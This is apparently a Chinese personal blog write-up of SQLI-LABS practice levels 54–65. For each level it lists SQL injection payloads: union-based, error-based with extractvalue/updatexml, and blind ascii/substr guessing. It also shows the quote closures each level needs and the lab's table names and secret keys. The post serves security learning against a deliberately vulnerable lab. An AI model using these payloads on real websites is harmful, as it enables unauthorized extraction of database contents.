SQLI-LABS 靶场通过小记(54~65)

Posted 2021-08-13 曹振国cc

54~65

• • • • Less-54:
      • • 1.查询数据库
        • 2.查询表
        • 3.查询字段
        • 4.查询数据
      • Less-55:
      • Less-56:
      • Less-57:
      • Less-58:
      • • 1.报错注入查询库名
        • 2.查询表名
        • 3.查询字段
        • 4.查询数据
      • Less-59:
      • Less-60:
      • Less-61:
      • Less-62:
      • • 1.判断数据库名的长度
        • 2.利用ascii码猜测数据库名
      • Less-63:
      • Less-64:
      • Less-65:
• :cherry_blossom:​完结撒花:cherry_blossom:
•   ​1~65，堆叠注入和报错注入挺让人头疼的所以我写的比较简单，为了做出这65道题翻阅了有7，8篇博客（因为我比较菜）:hugs:​，做完这65道题收获还是蛮多的，也更让我深刻的认识到了自身的不足，还是需要继续“好好学习，天天向上”啊:books::pencil2:​​:books:​:pencil2:​！

Less-54:

1.查询数据库

?id=-1' union select 1,database(),3 -- qwe					//库：challenges

2.查询表

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' -- qwe		//表：0HH6JD95U8

3.查询字段

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='0HH6JD95U8' -- qwe		//字段：id,sessid,secret_IK8H,tryy

4.查询数据

?id=-1' union select 1,group_concat(secret_IK8H),3 from 0HH6JD95U8 -- qwe				//key：5TyUvzJndld9x4XamGn09368

Less-55:

和54题相同，只不过需要括号)闭合

?id=-1) union select 1,2,3 -- qwe

Less-56:

与54题相同，只不过需要单引号括号')闭合

?id=-1') union select 1,2,3 -- qwe

Less-57:

与54题相同，只不过这道题需要双引号"闭合

?id=-1" union select 1,2,3 -- qwe

Less-58:

通过在id后加反斜杠，发现需要单引号'闭合，经过测试不能通过union进行联合查询，但是会产生报错信息，使用报错注入

1.报错注入查询库名

?id=-1' and extractvalue(1, concat(0x5c, (select database()))) -- qwe			//库名：challenges

2.查询表名

?id=-1' and updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema='challenges' limit 0,1)),0) -- qwe
//表：46AZEIPRHM		199S5PGWIH

3.查询字段

?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='199S5PGWIH' limit 0,1),0x7e),1) -- qwe
//字段：id,sessid,secret_QGRQ,tryy

4.查询数据

?id=-1' and updatexml(1,concat(0x7e,(select secret_QGRQ from 199S5PGWIH limit 0,1),0x7e),1) -- qwe
//数据：eqF0rqlhQso5Ce2DtnCtJ3JU

Less-59:

与58题相同，不用单引号闭合

/?id=-1 and extractvalue(1, concat(0x5c, (select database()))) -- qwe

Less-60:

与58题相同，只不过需要使用双引号括号")闭合

?id=-1") and extractvalue(1, concat(0x5c, (select database()))) -- qwe

Less-61:

与58题相同，这题需要使用单引号括号括号'))闭合

?id=-1')) and extractvalue(1, concat(0x5c, (select database()))) -- qwe

Less-62:

使用')闭合，在130次内完成盲注

1.判断数据库名的长度

?id=1') and length(database()=10) -- qwe							//正常说明是长度是10

2.利用ascii码猜测数据库名

?id=1') and ascii(substr(database(),1,1))=99 -- qwe					c
?id=1') and ascii(substr(database(),2,1))=104 -- qwe				h
............阿巴阿巴太多了，以此类推吧

Less-63:

与62题相同，使用单引号闭合

?id=1' and ascii(substr(database(),1,1))=99 -- qwe					c

Less-64:

与62题相同，使用括号括号))闭合

?id=1)) and ascii(substr(database(),1,1))=99 -- qwe

Less-65:

无需闭合

?id=1 and ascii(substr(database(),1,1))=99 -- qwe

---

🌸​完结撒花🌸

  ​1~65，堆叠注入和报错注入挺让人头疼的所以我写的比较简单，为了做出这65道题翻阅了有7，8篇博客（因为我比较菜）🤗​，做完这65道题收获还是蛮多的，也更让我深刻的认识到了自身的不足，还是需要继续“好好学习，天天向上”啊📚✏️​​📚​✏️​！